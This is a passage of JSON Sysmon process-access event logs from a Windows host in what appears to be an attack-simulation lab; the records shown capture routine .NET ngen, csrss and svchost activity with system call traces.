\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7176,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.070\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-0010E3F80B00}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.070","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-0010E3F80B00}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7177,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.070\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-0010E3F80B00}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.070","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-0010E3F80B00}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7178,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-0010E3F80B00}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-0010E3F80B00}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7179,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.117\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-001034FC0B00}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.117","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-001034FC0B00}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7180,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.117\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-001034FC0B00}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.117","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-001034FC0B00}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7181,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.132\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-0010525C0C00}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.132","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-0010525C0C00}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7182,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.163\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-00109E000C00}\r\nTargetProcessId: 2508\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.163","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-00109E000C00}","TargetProcessId":"2508","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7183,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.163\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-00109E000C00}\r\nTargetProcessId: 2508\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 